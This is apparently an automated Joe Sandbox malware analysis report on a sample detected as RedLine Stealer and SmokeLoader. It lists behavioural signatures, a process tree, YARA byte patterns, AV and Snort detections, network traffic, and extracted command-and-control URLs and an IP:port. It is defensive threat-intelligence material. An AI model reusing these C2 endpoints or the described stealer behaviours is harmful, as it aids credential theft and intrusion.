Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:1351848
MD5:838dde728f0210f3b430417a57cadcd7
SHA1:ba823491f0e0a5bd33685d6ab18b21ce10da1f78
SHA256:6f418d1bb71dc74d174f5fec3d04492d3f09e61dc4cd4f9e361ad3edb8af9d13
Tags:exe
Infos:

Detection

RedLine, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Injects code into the Windows Explorer (explorer.exe)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to resolve many domain names, but no domain seems valid
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Connects to many different domains
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Creates a window with clipboard capturing capabilities
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • file.exe (PID: 1836 cmdline: C:\Users\user\Desktop\file.exe MD5: 838DDE728F0210F3B430417A57CADCD7)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • regsvr32.exe (PID: 5040 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\451C.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
        • regsvr32.exe (PID: 3984 cmdline: /s C:\Users\user\AppData\Local\Temp\451C.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • 4888.exe (PID: 4040 cmdline: C:\Users\user\AppData\Local\Temp\4888.exe MD5: D26B3F28D2687A79CED195BA9899B524)
        • AppLaunch.exe (PID: 7064 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 89D41E1CF478A3D3C2C701A27A5692B2)
      • 4AFA.exe (PID: 3796 cmdline: C:\Users\user\AppData\Local\Temp\4AFA.exe MD5: 33A60439E95F0DFC10016075F97AEB0C)
        • WerFault.exe (PID: 3976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 360 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • 501B.exe (PID: 3204 cmdline: C:\Users\user\AppData\Local\Temp\501B.exe MD5: 57C833BFD5042E34BEC23DFD711CD151)
        • 501B.exe (PID: 3492 cmdline: C:\Users\user\AppData\Local\Temp\501B.exe MD5: 57C833BFD5042E34BEC23DFD711CD151)
      • 6942.exe (PID: 2832 cmdline: C:\Users\user\AppData\Local\Temp\6942.exe MD5: 41C7BCD9B6084D7A61B8A54DF1A525E0)
      • explorer.exe (PID: 5996 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 3132 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • csrss.exe (PID: 4884 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 57C833BFD5042E34BEC23DFD711CD151)
        • csrss.exe (PID: 352 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 57C833BFD5042E34BEC23DFD711CD151)
      • csrss.exe (PID: 5024 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 57C833BFD5042E34BEC23DFD711CD151)
        • csrss.exe (PID: 3360 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 57C833BFD5042E34BEC23DFD711CD151)
  • fjdvfwi (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\fjdvfwi MD5: 838DDE728F0210F3B430417A57CADCD7)
  • wjdvfwi (PID: 7116 cmdline: C:\Users\user\AppData\Roaming\wjdvfwi MD5: 41C7BCD9B6084D7A61B8A54DF1A525E0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://kumbuyartyty.net/", "http://criogetikfenbut.org/", "http://stualialuyastrelia.net/", "http://onualituyrs.org/", "http://sumagulituyo.org/", "http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}
{"C2 url": "193.233.132.48:24324"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000006.00000002.2580322580.0000000002351000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000006.00000002.2580322580.0000000002351000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
          • 0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
          00000019.00000002.3064349726.0000000000991000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            Click to see the 36 entries
            SourceRuleDescriptionAuthorStrings
            18.2.6942.exe.910e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              6.2.fjdvfwi.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                25.2.wjdvfwi.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  0.2.file.exe.890e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    0.3.file.exe.8a0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      Click to see the 11 entries
                      No Sigma rule has matched
                      Timestamp:34.143.166.163192.168.2.680497182037771 12/02/23-02:06:37.590352
                      SID:2037771
                      Source Port:80
                      Destination Port:49718
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:104.198.2.251192.168.2.680497172037771 12/02/23-02:06:35.664625
                      SID:2037771
                      Source Port:80
                      Destination Port:49717
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:34.94.245.237192.168.2.680497162037771 12/02/23-02:06:35.075173
                      SID:2037771
                      Source Port:80
                      Destination Port:49716
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://atozrental.cc/atoz/index.phpAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeAvira: detection malicious, Label: HEUR/AGEN.1312455
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeAvira: detection malicious, Label: HEUR/AGEN.1312455
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiAvira: detection malicious, Label: HEUR/AGEN.1312455
                      Source: C:\ProgramData\Drivers\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1312455
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeAvira: detection malicious, Label: HEUR/AGEN.1312455
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiAvira: detection malicious, Label: HEUR/AGEN.1312455
                      Source: 00000000.00000002.2209260070.00000000008E0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://kumbuyartyty.net/", "http://criogetikfenbut.org/", "http://stualialuyastrelia.net/", "http://onualituyrs.org/", "http://sumagulituyo.org/", "http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}
                      Source: AppLaunch.exe.7064.11.memstrminMalware Configuration Extractor: RedLine {"C2 url": "193.233.132.48:24324"}
                      Source: file.exeReversingLabs: Detection: 40%
                      Source: file.exeVirustotal: Detection: 44%Perma Link
                      Source: file.exeAvira: detected
                      Source: lightseinsteniki.orgVirustotal: Detection: 22%Perma Link
                      Source: humydrole.comVirustotal: Detection: 15%Perma Link
                      Source: stualialuyastrelia.netVirustotal: Detection: 25%Perma Link
                      Source: C:\ProgramData\Drivers\csrss.exeReversingLabs: Detection: 48%
                      Source: C:\Users\user\AppData\Local\Temp\451C.dllReversingLabs: Detection: 40%
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeReversingLabs: Detection: 56%
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeReversingLabs: Detection: 48%
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeReversingLabs: Detection: 48%
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiReversingLabs: Detection: 40%
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\451C.dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiJoe Sandbox ML: detected
                      Source: C:\ProgramData\Drivers\csrss.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiJoe Sandbox ML: detected
                      Source: 501B.exe, 00000011.00000003.3709814297.00000000040B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_2d363e9b-6
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 45.66.33.45:443 -> 192.168.2.6:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.6:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 199.58.81.140:443 -> 192.168.2.6:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.241.208.163:443 -> 192.168.2.6:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 51.81.56.229:443 -> 192.168.2.6:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51461 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.115.173.188:443 -> 192.168.2.6:51454 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.115.173.188:443 -> 192.168.2.6:51455 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 69.160.38.2:443 -> 192.168.2.6:51463 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.204.29:443 -> 192.168.2.6:51437 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.64.163.50:443 -> 192.168.2.6:51439 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 69.160.38.2:443 -> 192.168.2.6:51543 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 64.71.33.31:443 -> 192.168.2.6:51709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 81.31.35.50:443 -> 192.168.2.6:51460 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 81.31.35.50:443 -> 192.168.2.6:51451 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.172.160.19:443 -> 192.168.2.6:51432 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51462 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.120.236.18:443 -> 192.168.2.6:51429 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.115.173.188:443 -> 192.168.2.6:51969 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 85.255.14.18:443 -> 192.168.2.6:51427 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 85.255.14.18:443 -> 192.168.2.6:52091 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.68.234.252:443 -> 192.168.2.6:51434 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.64.163.50:443 -> 192.168.2.6:51456 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.172.160.19:443 -> 192.168.2.6:52087 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.120.236.18:443 -> 192.168.2.6:51948 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.96.160.144:443 -> 192.168.2.6:51705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 66.96.160.144:443 -> 192.168.2.6:52093 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:54952 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:54953 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.172.160.19:443 -> 192.168.2.6:54818 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.172.160.19:443 -> 192.168.2.6:55199 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:55331 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:55678 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.204.29:443 -> 192.168.2.6:56050 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:57652 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49782 version: TLS 1.2
                      Source: Binary string: C:\cgAUC0kVAbAHm68KluuRgWekCUenpnKE\SportSuit.pdb source: 4888.exe, 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: C:\cgAUC0kVAbAHm68KluuRgWekCUenpnKE\SportSuit.pdb% source: 4888.exe, 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmp
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006AB2BD FindFirstFileExW,10_2_006AB2BD
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006AB7A1 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_006AB7A1

                      Networking

                      barindex
                      Source: C:\Windows\explorer.exeNetwork Connect: 34.143.166.163 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.198.2.251 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 34.94.245.237 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 211.119.84.112 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 186.182.55.44 80Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 91.215.85.17 80
                      Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.94.245.237:80 -> 192.168.2.6:49716
                      Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 104.198.2.251:80 -> 192.168.2.6:49717
                      Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.143.166.163:80 -> 192.168.2.6:49718
                      Source: global trafficTCP traffic: 69.160.38.2 ports 22,143,222,3,443,465,993,4,995,80,21
                      Source: global trafficTCP traffic: 15.197.142.173 ports 22,143,3,443,465,4,995,80,21
                      Source: global trafficTCP traffic: 85.255.14.18 ports 22,3,443,4,80,21
                      Source: global trafficTCP traffic: 188.120.236.18 ports 22,3,443,4,80,21
                      Source: global trafficTCP traffic: 66.115.173.188 ports 22,143,2,443,465,995,80,21
                      Source: global trafficTCP traffic: 195.68.234.252 ports 22,143,2,443,465,995,80,21
                      Source: global trafficTCP traffic: 81.31.35.50 ports 22,3,443,4,80,21
                      Source: global trafficTCP traffic: 178.172.160.19 ports 22,143,1,2,443,465,995,80,21
                      Source: global trafficTCP traffic: 3.64.163.50 ports 22,143,3,443,465,4,995,80,21
                      Source: Malware configuration extractorURLs: http://kumbuyartyty.net/
                      Source: Malware configuration extractorURLs: http://criogetikfenbut.org/
                      Source: Malware configuration extractorURLs: http://stualialuyastrelia.net/
                      Source: Malware configuration extractorURLs: http://onualituyrs.org/
                      Source: Malware configuration extractorURLs: http://sumagulituyo.org/
                      Source: Malware configuration extractorURLs: http://snukerukeutit.org/
                      Source: Malware configuration extractorURLs: http://lightseinsteniki.org/
                      Source: Malware configuration extractorURLs: http://tyiuiunuewqy.org/
                      Source: Malware configuration extractorURLs: http://liuliuoumumy.org/
                      Source: Malware configuration extractorURLs: http://tonimiuyaytre.org/
                      Source: Malware configuration extractorURLs: 193.233.132.48:24324
                      Source: unknownDNS traffic detected: query: ssh.mlk546gabr.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.bdoxwz.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: pop3.ershov.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.yahoogabes.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.er.stygg replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: condorponteggi.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.winstonlf.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: topbingo-games.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.my-bingo-games.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.euromarin.es replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.erofeev.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: bdoxwz.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.aopcgaming.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.brevesdunsoir.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: pop3.ext.by replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: euromarin.es replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.mcsmk8.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: imap.datasense.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.my-bingo-games.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.entodo.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.tomsknetru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: goexlife.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.topbingo-games.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: imap.yoymail.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.euromarin.es replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.exmur.nia.nih.gov replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.goexlife.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.princessmonty.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.mail.tomsknetru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.assiri.tk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: devbreeze.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.princessmonty.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.egmaik.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.rabco.be replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.princessmonty.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.cznkqhnq.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.bdoxwz.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: brevesdunsoir.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.devbreeze.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: erofeev.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.kidj.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mailgate.conceptualintegration.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: assiri.tk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.devbreeze.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.bingo.coza replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.erofeev.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: yahoogabes.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.elyashevich.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.yoymail.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: rabco.be replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.winstonlf.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.egmaik.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.ershov.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: my-bingo-games.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.goexlife.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: imap.3marc.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.ext.by replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: yoymail.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.r2husers.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: joslindisplaysinc.co replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.er.stygg replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.erofeev.info replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.brevesdunsoir.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.condorponteggi.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: llefigaro.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: pop3.yoymail.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: imap.goexlife.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.devbreeze.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.egmaik.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.winstonlf.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.noxnoir.dk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.llefigaro.fr replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.elseti.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.yoymail.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.aopcgaming.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.cznkqhnq.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.yoymail.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.mail.tomsknetru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.assiri.tk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.manizan.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: bingo.coza replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.joslindisplaysinc.co replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: cznkqhnq.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: er.stygg replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: elseti.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.condorponteggi.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.goexlife.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: winstonlf.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.bingo.coza replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftp.mlk546gabr.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: relay.finaleasing.it replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.euromarin.es replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mailgate.doriangrey.ru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: onualituyrs.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mailgate.entodo.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ssh.bdoxwz.com replaycode: Name error (3)
